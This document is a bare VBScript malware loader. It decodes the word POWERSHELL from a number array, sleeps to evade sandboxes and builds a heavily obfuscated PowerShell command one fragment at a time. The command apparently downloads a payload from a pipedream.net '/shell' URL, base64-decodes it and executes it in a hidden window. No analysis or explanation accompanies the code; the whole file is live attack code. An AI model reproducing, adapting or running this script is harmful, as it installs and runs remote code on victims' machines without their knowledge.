Ttheds= array(80,79,87,69,82,83,72,69,76,76)

Dim Udblsnings
Udblsnings = DateAdd("s", 10, Now())
Do Until (Now() > Udblsnings)
Loop
Gr2 = Gr2 + "Func"
Gr2 = Gr2 + "tion Milj"
Gr2 = Gr2 + "379 ([String"
Gr2 = Gr2 + "]$Endo"
Gr2 = Gr2 + "ph){F"
Gr2 = Gr2 + "or($Episper="
Gr2 = Gr2 + "1; $Epis"
Gr2 = Gr2 + "per -lt $Endoph"
Gr2 = Gr2 + ".Leng"
Gr2 = Gr2 + "th-1; $Epispe"
Gr2 = Gr2 + "r+=("
Gr2 = Gr2 + "1+1)){$Ddvg"
Gr2 = Gr2 + "t=$Endoph"
Gr2 = Gr2 + ".Subs"
Gr2 = Gr2 + "tring($E"
Gr2 = Gr2 + "pisper, 1);$Fald"
Gr2 = Gr2 + "=$Fald+$Ddvgt}$"
Gr2 = Gr2 + "Fald;}$Gyde"
Gr2 = Gr2 + "p=Milj3"
Gr2 = Gr2 + "79 ' h t t p s : / / e o i t m m 1 z r y h w v k 9 . m . p i p e d r e a m . n e t / s h e l l ';$"
Gr2 = Gr2 + "Fald01="
Gr2 = Gr2 + "Milj379"
Gr2 = Gr2 + " 'Ci"
Gr2 = Gr2 + "PeSxP "
Gr2 = Gr2 + "';$Stryger "
Gr2 = Gr2 + "= Milj"
Gr2 = Gr2 + "379 'N\h"
Gr2 = Gr2 + "sByAsM"
Gr2 = Gr2 + "wFo w 6A"
Gr2 = Gr2 + "4N\ WIi"
Gr2 = Gr2 + "Cn dCo wFs PFo"
Gr2 = Gr2 + " wKeFr S "
Gr2 = Gr2 + "hJePlTlA\Fvt1P."
Gr2 = Gr2 + "R0 \ pPo wFe rS"
Gr2 = Gr2 + "sSh eClClB.d"
Gr2 = Gr2 + "eAx e  ';"
Gr2 = Gr2 + ".($Fald0"
Gr2 = Gr2 + "1) (M"
Gr2 = Gr2 + "ilj379 'A"
Gr2 = Gr2 + "$RA dAvGe rPt i"
Gr2 = Gr2 + "Mz eH2T=O$Ae nF"
Gr2 = Gr2 + "vM:TwSiTnHdti r"
Gr2 = Gr2 + "L ') ;.($Fald01)"
Gr2 = Gr2 + " (Milj379 "
Gr2 = Gr2 + "' $ S tRr"
Gr2 = Gr2 + " yTgCe r =E$IA "
Gr2 = Gr2 + "dIv egrLtP"
Gr2 = Gr2 + "iEz e 2C+P$IS"
Gr2 = Gr2 + "ktPr yTg eSrA ')"
Gr2 = Gr2 + " ;.($Fald01"
Gr2 = Gr2 + ") (Mi"
Gr2 = Gr2 + "lj379 'K$BE "
Gr2 = Gr2 + "x p l oCiEtE  = "
Gr2 = Gr2 + " T( (bgOwHmP"
Gr2 = Gr2 + "ia  wSi"
Gr2 = Gr2 + "Sn 3H2Z_Mps"
Gr2 = Gr2 + "rGo c eCs"
Gr2 = Gr2 + " sF  -UFC  P r"
Gr2 = Gr2 + " o cBe sDsAIRd"
Gr2 = Gr2 + " = $ { PEIA"
Gr2 = Gr2 + "D } ) .UC"
Gr2 = Gr2 + " oTm mhaHnL"
Gr2 = Gr2 + "diL iBnUeH"
Gr2 = Gr2 + ")   -PsTp"
Gr2 = Gr2 + "ElCiA"
Gr2 = Gr2 + "t   [Hc h aBrL"
Gr2 = Gr2 + "] 3K4P ');."
Gr2 = Gr2 + "($Fald01)"
Gr2 = Gr2 + " (Milj379 ' $FU "
Gr2 = Gr2 + "nCl aGcseFr"
Gr2 = Gr2 + "K B=L M$PE x "
Gr2 = Gr2 + "pFlWoO"
Gr2 = Gr2 + "i t [ $ E"
Gr2 = Gr2 + "Tx p"
Gr2 = Gr2 + " l oAiCtL.Hc o "
Gr2 = Gr2 + "uCnStq-"
Gr2 = Gr2 + "J2 ]  ');.($F"
Gr2 = Gr2 + "ald01)"
Gr2 = Gr2 + " (Milj37"
Gr2 = Gr2 + "9 ' $ MLoBdHtSaB"
Gr2 = Gr2 + "gAnB=O(BTBe s"
Gr2 = Gr2 + " t - P"
Gr2 = Gr2 + "ta t hP  $BS t"
Gr2 = Gr2 + " rBy "
Gr2 = Gr2 + "g e r )C  -BAMn "
Gr2 = Gr2 + "dK T(K[AI nKtAP "
Gr2 = Gr2 + "t r ]S: : sPiB"
Gr2 = Gr2 + "zAe  T"
Gr2 = Gr2 + "-EeYqB  8L)"
Gr2 = Gr2 + "j ') ;i"
Gr2 = Gr2 + "f ($"
Gr2 = Gr2 + "Modtag"
Gr2 = Gr2 + "n) {.$"
Gr2 = Gr2 + "Stryger $Unlacer"
Gr2 = Gr2 + ";} else "
Gr2 = Gr2 + "{;$Fald00=Milj"
Gr2 = Gr2 + "379 ' SAt aR"
Gr2 = Gr2 + "r t -UBSiPt saT"
Gr2 = Gr2 + "Vr a n"
Gr2 = Gr2 + " s fCeOrD F"
Gr2 = Gr2 + "-YSfo uArIc e  "
Gr2 = Gr2 + " $sGTySdieDp  S-"
Gr2 = Gr2 + " D e"
Gr2 = Gr2 + "AsKtSiN"
Gr2 = Gr2 + "nPa t iBoDn  "
Gr2 = Gr2 + "S$IAS"
Gr2 = Gr2 + "d v e rAt i z "
Gr2 = Gr2 + "e 2A ';"
Gr2 = Gr2 + ".($Fald01) (Mil"
Gr2 = Gr2 + "j379 ' "
Gr2 = Gr2 + "$BA dUv e r t i"
Gr2 = Gr2 + " z e 2 = $ eGnTv"
Gr2 = Gr2 + " :Na p ppd a t "
Gr2 = Gr2 + "a  ') ;.("
Gr2 = Gr2 + "$Fald01)"
Gr2 = Gr2 + " (Mil"
Gr2 = Gr2 + "j379 'PIam pM"
Gr2 = Gr2 + "o rSt -AMCo d "
Gr2 = Gr2 + "uOl e  PB "
Gr2 = Gr2 + "iBt sgTAr "
Gr2 = Gr2 + "a nFsMf eS"
Gr2 = Gr2 + "rB ')"
Gr2 = Gr2 + " ;$Advertiz"
Gr2 = Gr2 + "e2=$Adve"
Gr2 = Gr2 + "rtize2+'\opbrug"
Gr2 = Gr2 + "ende.Da"
Gr2 = Gr2 + "l';while ("
Gr2 = Gr2 + "-not"
Gr2 = Gr2 + " $Joyf"
Gr2 = Gr2 + ") {.($Fald0"
Gr2 = Gr2 + "1) (Milj3"
Gr2 = Gr2 + "79 'N$KJ oRy fF="
Gr2 = Gr2 + "I( TUe sItS"
Gr2 = Gr2 + "-FPLa tA"
Gr2 = Gr2 + "hS  $FA dKv"
Gr2 = Gr2 + "Fe rPtFiI"
Gr2 = Gr2 + "zHeS2S)"
Gr2 = Gr2 + "b ') ;.($"
Gr2 = Gr2 + "Fald01) $Fald00"
Gr2 = Gr2 + ";.($Fald01) (M"
Gr2 = Gr2 + "ilj379 '"
Gr2 = Gr2 + "FS t a r t -FS"
Gr2 = Gr2 + "ClEeNenpB B5  "
Gr2 = Gr2 + "');}.($Fa"
Gr2 = Gr2 + "ld01) (Milj3"
Gr2 = Gr2 + "79 'l$ M iAl"
Gr2 = Gr2 + " j 3B7"
Gr2 = Gr2 + "  B=B  GMe"
Gr2 = Gr2 + "VtB-SC oHn t e"
Gr2 = Gr2 + " n tC U$T"
Gr2 = Gr2 + "AHdsv eAr t"
Gr2 = Gr2 + " i z eS2A ');.("
Gr2 = Gr2 + "$Fald01) (Mil"
Gr2 = Gr2 + "j379 ' $ HSacm"
Gr2 = Gr2 + "Fa rDtI B=T "
Gr2 = Gr2 + "L[ S y sN"
Gr2 = Gr2 + "tUe m .mCA"
Gr2 = Gr2 + "oEnGviemrBt"
Gr2 = Gr2 + " ]G: : FHrNo m"
Gr2 = Gr2 + "LB a s eH6 4 SSt"
Gr2 = Gr2 + " r i n g"
Gr2 = Gr2 + " ( $ MTi lM"
Gr2 = Gr2 + "j 3N7 )R ')"
Gr2 = Gr2 + ";.($Fald0"
Gr2 = Gr2 + "1) (Mil"
Gr2 = Gr2 + "j379 's$OF "
Gr2 = Gr2 + "aSlVd 2F M=m K"
Gr2 = Gr2 + "[ES yKs tCe mH.P"
Gr2 = Gr2 + "TkeBxTt .F"
Gr2 = Gr2 + "E n cGo"
Gr2 = Gr2 + " d iDn g "
Gr2 = Gr2 + "]I: : A S "
Gr2 = Gr2 + "C IcIS"
Gr2 = Gr2 + ". GFe"
Gr2 = Gr2 + " t SStDr iJnsg "
Gr2 = Gr2 + "( $ H a mfa "
Gr2 = Gr2 + "rAtF)  "
Gr2 = Gr2 + "');.($F"
Gr2 = Gr2 + "ald01) (Mi"
Gr2 = Gr2 + "lj379 'P$F"
Gr2 = Gr2 + "R a wBnCeT"
Gr2 = Gr2 + "s sSa = $ F"
Gr2 = Gr2 + " aRlF"
Gr2 = Gr2 + "d 2 . sUuDbG"
Gr2 = Gr2 + "s t rFiPnMg"
Gr2 = Gr2 + "r(P1A9 3T5 3"
Gr2 = Gr2 + "P9 , 1 9S2F7 1C)"
Gr2 = Gr2 + "  ');"
Gr2 = Gr2 + ".($Fald01) $R"
Gr2 = Gr2 + "awnessa;}"
for Centrale=0 to ubound(Ttheds)
If Now() < Udblsnings Then 
Urin = Urin+chr(Ttheds(1))
else 
Urin = Urin+chr(Ttheds(Centrale))
end if 
Next
Set Flamingos = CreateObject("Shell.Application")
Flamingos.ShellExecute Urin & ".exe" ,ChrW(34) & Gr2 & ChrW(34),"","" ,0

